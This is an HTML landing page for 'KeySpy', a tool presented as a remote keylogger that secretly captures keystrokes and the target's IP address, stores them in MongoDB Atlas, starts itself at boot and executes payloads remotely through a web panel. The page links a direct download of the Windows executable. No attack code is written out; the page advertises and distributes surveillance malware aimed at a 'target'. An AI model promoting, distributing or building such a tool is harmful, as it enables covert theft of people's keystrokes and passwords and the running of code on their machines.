<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>KeySpy</title>
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet">
    <link rel="icon" type="image/png" href="./img/kSpy-logo-crop.png">
    <style>
        body {
            background-color: #343a40;
            color: #ffffff;
            padding-top: 0; /* Removed top padding */
            padding-bottom: 0; /* Removed bottom padding */
        }

        .header {
            background-color: #5d5e5f; /* Gray color for header */
            height: 70px;
            font-family: monospace;
            font-size: 1.7rem;
            font-weight: bold;
            padding: 1rem 1.5rem; /* Adjusted padding */
            display: flex;
            justify-content: space-between; /* Adjusted to space-between */
            align-items: center;
            margin-bottom: 0; /* Removed margin bottom */
        }

        .header span {
            margin-right: 1.5rem; /* Increased space between KeySpy and Visit GitHub */
        }

        /* Added CSS rule for Image with Text Section */
        .image-text-section {
            background-color: #43b581; /* Different background color */
            padding: 2rem;
            margin-top: -48px; /* Removed the margin between header and this section */
            margin-left: -15px;
            width: 98.9vw; /* Set width to 100% of viewport width */
        }
        .image-text-section ul li {
            margin-bottom: 0.3rem;
            list-style-type: none;
        }

        .btn-dnld{
            background-color: #5d8fdf;
            color: hsla(0, 0%, 22%, 0.87);
            font-weight: bold;
            font-size: 1.3rem;
        }
    </style>
</head>

<body>
    <!-- Header Section -->
    <header class="header"> <!-- Decreased header height -->
    <div class="d-flex align-items-center">
        <img src="./img/kSpy-logo.png" alt="Icon" height="60">
        <span class="ml-2" style="margin-right: 2rem;">KeySpy</span> <!-- Added margin to the KeySpy text -->
    </div>
    <div>
        <a href="https://github.com/3rr0r-505/KeySpy" target="_blank" class="btn btn-secondary">
        <i class="fab fa-github"></i> Visit GitHub
        </a>
    </div>
    </header>

    <!-- Main Content -->
    <main class="container-fluid py-5 text-center">
        <!-- Image with Text Section -->
        <section class="mb-4 image-text-section"> <!-- Added class for the background color -->
            <div class="row align-items-center">
                <!--Image segment-->
                <div class="col-md-6">
                    <img src="./img/kSpy-logo-crop.png" alt="Image" class="img-fluid" width="400" height="400">
                </div>
                <!--Text segment-->
                <div class="col-md-6">
                    <h1>KeySpy - Remote Keylogger & RPE</h1>
                    <p style="font-size: 16px; font-weight:bold; margin-bottom: 1px">An advance Python keylogger with web interface for viewing captured keystrokes & executing payloads remotely in real-time.</p>
                    <h3>Features:</h3>
                    <ul>
                        <li>1. Captures keystrokes in the background while running.</li>
                        <li>2. Stores captured keystrokes in mongoDB Atlas.</li>
                        <li>3. Displays captured keystrokes in a web interface.</li>
                        <li>4. Executes Payloads remotely.</li>
                        <li>5. Allows viewing keystrokes from multiple sessions.</li>
                        <li>6. Auto Start-up on system boot.</li>
                        <li>7. Captures IPv4 address of target.</li>
                    </ul>
                    <p align="center"> 
                        <a href="https://www.python.org/"><img alt="" src="https://img.shields.io/badge/python-3.9%2B-blue?logo=python&logoColor=88d4d7"/></a>
                        &nbsp;
                        <a href="https://flask.palletsprojects.com/en/3.0.x/"><img alt="" src="https://img.shields.io/badge/Flask-v3.0.3-45aec2?logo=flask&logoColor=45aec2"/></a>
                        &nbsp;
                        <a href="https://nodejs.org/en"><img alt="" src="https://img.shields.io/badge/Node.js-v16.4.0-339933?logo=node.js"/></a>
                        &nbsp;
                        <a href="https://www.mongodb.com/"><img alt="" src="https://img.shields.io/badge/MongoDB%20Atlas-v4.4.6-009441?logo=mongodb&logoColor=009441"/></a>
                        <br>
                        <a href="https://vercel.com"><img alt="" src="https://img.shields.io/badge/Deployed%20with-Vercel-black?logo=vercel"/></a>
                        &nbsp;
                        <a href="https://www.google.com/chrome/"><img alt="" src="https://img.shields.io/badge/Extension-Chrome-669df6?logo=google-chrome&logoColor=aecbfa"/></a>
                        &nbsp;
                        <a href="https://www.microsoft.com/en-us/windows?r=1"><img alt="" src="https://img.shields.io/badge/OS-Windows-brighten?logo=windows&logoColor=blue&label=OS&labelColor=grey&color=blue"/></a><br>
                    </p>
                    <a href="https://github.com/3rr0r-505/KeySpy/releases/download/v1.5/kSpy-AIO_v1.5.exe" class="btn btn-success btn-dnld" download>
                    Download KeySpy
                    </a>
                </div>
            </div>
        </section>

        <!-- Three Segments Section -->
        <section>
            <div class="row justify-content-center">
                <div class="col-md-4 mb-4">
                    <img src="./img/keylogger.png" alt="Image 1" class="img-fluid"  width="200" height="200">
                    <h2>Keylogger</h2>
                    <p>Capture opened applications where keystrokes are made & store them in mongoDB.</p>
                </div>
                <!--<div class="col-md-4 mb-4">
                    <img src="./img/extn.png" alt="Image 2" class="img-fluid" width="200" height="200">
                    <h2>Extension</h2>
                    <p>Capture the open sites and keystrokes on them & store them. <br> For more info, visit <a href="https://github.com/3rr0r-505/WebSpy" target="_blank">WebSpy</a>.</p>
                </div>-->
                <div class="col-md-4 mb-4">
                    <img src="./img/intrface.png" alt="Image 3" class="img-fluid" width="200" height="200">
                    <h2>Web Interface</h2>
                    <p>For Monitor the Keylogs & Execute the Payloads, visit <a href="https://w3blogger.vercel.app/" target="_blank">w3blogger.vercel.app</a>.</p>
                </div>
            </div>
        </section>
    </main>

    <!-- Footer Section -->
    <footer class="footer text-light text-center py-3"> 
        <div class="container">
            <div class="row justify-content-center">
                <div class="col-md-12">
                    <p>&copy;2024 KeySpy. Developed by <a href="https://github.com/3rr0r-505" target="_blank" class="text-light"><i class="fab fa-github"></i>@5pyD3R</a></p>
                </div>
            </div>
        </div>
    </footer>

    <!-- Font Awesome CDN -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/js/all.min.js"></script>
</body>
</html>
